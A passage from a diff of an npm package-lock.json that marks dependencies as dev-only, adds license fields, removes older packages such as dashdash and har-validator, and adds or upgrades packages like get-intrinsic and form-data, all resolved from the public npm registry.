"sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==" + "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", + "dev": true }, "node_modules/color-convert": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, "dependencies": { "color-name": "~1.1.4" }, @@ -1420,13 +1566,15 @@ "node_modules/color-name": { "version": "1.1.4", "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dev": true, + "license": "MIT", "dependencies": { "delayed-stream": "~1.0.0" }, @@ -1437,23 +1585,20 @@ "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "dev": true }, "node_modules/convert-source-map": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==" - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", "dev": true }, "node_modules/create-jest": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "chalk": "^4.0.0", @@ -1474,6 +1619,7 @@ "version": "7.0.6", "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "dev": true, "dependencies": { "path-key": "^3.1.0", "shebang-command": "^2.0.0", @@ -1483,22 +1629,11 @@ "node": ">= 8" } }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, "node_modules/debug": { "version": "4.3.4", "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, "dependencies": { "ms": "2.1.2" }, @@ -1515,6 +1650,7 @@ "version": "1.5.3", "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", + "dev": true, "peerDependencies": { "babel-plugin-macros": "^3.1.0" }, @@ -1528,6 +1664,7 @@ "version": "4.3.1", "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -1537,6 +1674,7 @@ "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "dev": true, + "license": "MIT", "engines": { "node": ">=0.4.0" } @@ -1545,6 +1683,7 @@ "version": "3.1.0", "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", + "dev": true, "engines": { "node": ">=8" } @@ -1553,24 +1692,31 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", + "dev": true, "engines": { "node": "^14.15.0 || ^16.10.0 || >=18.0.0" } }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "dev": true, + "license": "MIT", "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" } }, "node_modules/ejs": { "version": "3.1.10", "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", + "dev": true, "dependencies": { "jake": "^10.8.5" }, @@ -1584,12 +1730,14 @@ "node_modules/electron-to-chromium": { "version": "1.5.63", "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==" + "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", + "dev": true }, "node_modules/emittery": { "version": "0.13.1", "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", + "dev": true, "engines": { "node": ">=12" }, @@ -1600,28 +1748,91 @@ "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "dev": true + }, + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "dev": true, + "license": "MIT", + "dependencies": { + "once": "^1.4.0" + } }, "node_modules/error-ex": { "version": "1.3.2", "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", + "dev": true, "dependencies": { "is-arrayish": "^0.2.1" } }, - "node_modules/escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "dev": true, + "license": "MIT", "engines": { - "node": ">=6" + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/escalade": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", + "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "dev": true, + "engines": { + "node": ">=6" } }, "node_modules/escape-string-regexp": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", + "dev": true, "engines": { "node": ">=8" } @@ -1630,6 +1841,7 @@ "version": "4.0.1", "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", + "dev": true, "bin": { "esparse": "bin/esparse.js", "esvalidate": "bin/esvalidate.js" @@ -1642,6 +1854,7 @@ "version": "5.1.1", "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", + "dev": true, "dependencies": { "cross-spawn": "^7.0.3", "get-stream": "^6.0.0", @@ -1664,6 +1877,7 @@ "version": "0.1.2", "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", + "dev": true, "engines": { "node": ">= 0.8.0" } @@ -1672,6 +1886,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", + "dev": true, "dependencies": { "@jest/expect-utils": "^29.7.0", "jest-get-type": "^29.6.3", @@ -1683,36 +1898,24 @@ "node": "^14.15.0 || ^16.10.0 || >=18.0.0" } }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", - "dev": true - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", "dev": true, - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", - "dev": true + "license": "MIT" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", + "dev": true }, "node_modules/fb-watchman": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", + "dev": true, "dependencies": { "bser": "2.1.1" } @@ -1721,14 +1924,17 @@ "version": "1.0.4", "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", + "dev": true, "dependencies": { "minimatch": "^5.0.1" } }, "node_modules/filelist/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.2.tgz", + "integrity": "sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==", + "dev": true, + "license": "MIT", "dependencies": { "balanced-match": "^1.0.0" } @@ -1737,6 +1943,7 @@ "version": "5.1.6", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dev": true, "dependencies": { "brace-expansion": "^2.0.1" }, @@ -1748,6 +1955,7 @@ "version": "7.1.1", "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "dev": true, "dependencies": { "to-regex-range": "^5.0.1" }, @@ -1759,6 +1967,7 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, "dependencies": { "locate-path": "^5.0.0", "path-exists": "^4.0.0" @@ -1767,68 +1976,34 @@ "node": ">=8" } }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "dev": true, - "engines": { - "node": "*" - } - }, "node_modules/form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "dev": true, + "license": "MIT", "dependencies": { "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", "mime-types": "^2.1.12" }, "engines": { - "node": ">= 0.12" - } - }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dev": true, - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs-minipass/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" + "node": ">= 6" } }, - "node_modules/fs-minipass/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "dev": true }, "node_modules/fsevents": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", + "dev": true, "hasInstallScript": true, "optional": true, "os": [ @@ -1842,6 +2017,7 @@ "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dev": true, "funding": { "url": "https://github.com/sponsors/ljharb" } @@ -1850,6 +2026,7 @@ "version": "1.0.0-beta.2", "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", + "dev": true, "engines": { "node": ">=6.9.0" } @@ -1858,22 +2035,64 @@ "version": "2.0.5", "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "dev": true, "engines": { "node": "6.* || 8.* || >= 10.*" } }, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, "node_modules/get-package-type": { "version": "0.1.0", "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", + "dev": true, "engines": { "node": ">=8.0.0" } }, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "dev": true, + "license": "MIT", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, "node_modules/get-stream": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", + "dev": true, "engines": { "node": ">=10" }, @@ -1881,19 +2100,11 @@ "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0" - } - }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "dev": true, "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", @@ -1913,50 +2124,73 @@ "version": "11.12.0", "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", + "dev": true, "engines": { "node": ">=4" } }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, "node_modules/graceful-fs": { "version": "4.2.11", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true, "engines": { - "node": ">=4" + "node": ">=8" } }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", "dev": true, - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - 